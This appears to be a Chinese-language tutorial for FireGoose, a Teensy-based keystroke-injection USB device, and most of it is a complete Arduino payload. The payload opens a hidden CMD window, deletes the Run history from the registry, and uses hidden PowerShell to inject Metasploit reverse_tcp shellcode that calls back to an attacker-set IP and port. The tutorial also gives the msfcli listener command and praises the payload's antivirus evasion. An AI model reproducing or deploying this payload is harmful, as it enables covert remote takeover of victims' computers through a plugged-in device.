烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板,外观看起来很像USB Rubber Ducky(大黄鸭),但并非Hak5所销售版本。
所以没有使用USB Rubber Ducky的固件功能,不可以直接使用USB Rubber Ducky的脚本,可以直接使用Arduino IDE来编写自定义代码、也可以使用S.E.T、Kautilya套件生成代码使用。
自带SD卡槽,可外接SD作为扩展,支持BadUSB代码。
FreeBuf报道《烧鹅:中国人自己的HID Hacking Device》 , http://wiki.radiowar.org/烧鹅
原理:烧鹅模拟USB键盘,自动输入Win+R ,为了尽可能的隐藏,开启一个很小的CMD窗口,然后利用powershell 隐藏注入shellcode 来反弹shell。
首先在自己的服务器使用metasploit监听一个端口:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4443 E
然后将以下代码修改IP和你自己的端口之后编译 写入烧鹅,部分代码做了注释。
也可以去github下载代码: https://github.com/RadioWar/FireGoose
void setup() { delay(4000); //设置延时,给USB响应时间 Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); //按下Win键 Keyboard.set_key1(KEY_R); //按下R键 Keyboard.send_now(); //发送Win+R delay(100); Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的(精华) Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); delay(300); //利用注册表清除开始--运行的记录 Keyboard.println("reg delete HKCU//Software//Microsoft//Windows//CurrentVersion//Explorer//RunMRU /f"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); delay(100); //利用Pwoershell 隐藏窗口执行shellcode,不会生成文件(shellcode是MSF生成的reverse-tcp,当然你也可以替换成其他功能的shellcode) Keyboard.println("if exist C://Windows//SysWOW64 ( set PWRSHLXDD=C://Windows//SysWOW64//WindowsPowerShell//v1.0//powershell) else ( set PWRSHLXDD=powershell )"); Keyboard.print("%PWRSHLXDD% -nop -w hidden -c /"$1 = '$c = "); Keyboard.print("[DllImport(///"kernel32.dll///")]public static ext"); Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS"); Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm"); Keyboard.print("port(///"kernel32.dll///")]public static extern In"); Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint "); Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam"); Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl"); Keyboard.print("lImport(///"msvcrt.dll///")]public static extern I"); Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);"); Keyboard.print(";$w = Add-Type -memberDefinition $c -Name ///"Win3"); Keyboard.print("2///" -namespace Win32Functions -passthru;[Byte[]]"); Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,"); Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,"); Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,"); Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,"); Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,"); Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,"); Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,"); Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,"); Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,"); Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,"); Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,"); Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,"); Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"); Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,"); Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,"); Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,"); Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,"); Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,"); Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,"); Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,"); // 替换IP [0xC0,0xA8,0x00,0x68] --192.168.0.104 的16进制 // 替换端口 [0x11,0x5b] --4443的16进制 Keyboard.print("0xC0,0xA8,0x00,0x68,0x68,0x02,0x00,0x11,0x5b,0"); //这里改成通用版本的,方便自定义IP+Port Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0"); Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0"); Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0"); Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0"); Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0"); Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0"); Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0"); Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0"); Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -"); Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc"); Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length"); Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $"); Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;"); Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase"); Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes("); Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo"); Keyboard.print("ot + ///"////syswow64////WindowsPowerShell////v1.0"); Keyboard.print("////powershell///";$cmd = ///"-nop -noni -enc ///""); Keyboard.print(";iex ///" $x86 $cmd $gq///"}else{$cmd = ///"-nop -"); Keyboard.print("noni -enc///";iex ///" powershell $cmd $gq///";}/""); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); //执行以上powershell代码 Keyboard.set_modifier(0); //释放所有的按键 Keyboard.set_key1(0); Keyboard.send_now(); delay(300); } void loop() { }
PS:这个只能算是实现了自动化reverse Shell ,优点是窗口小,利用PS注入shellcode不会生成文件,可以绕过不少杀软的查杀。但是其隐藏效果并非完美,代码输入时间也有点长。大家可以脑洞一下,完善烧鹅的Payload。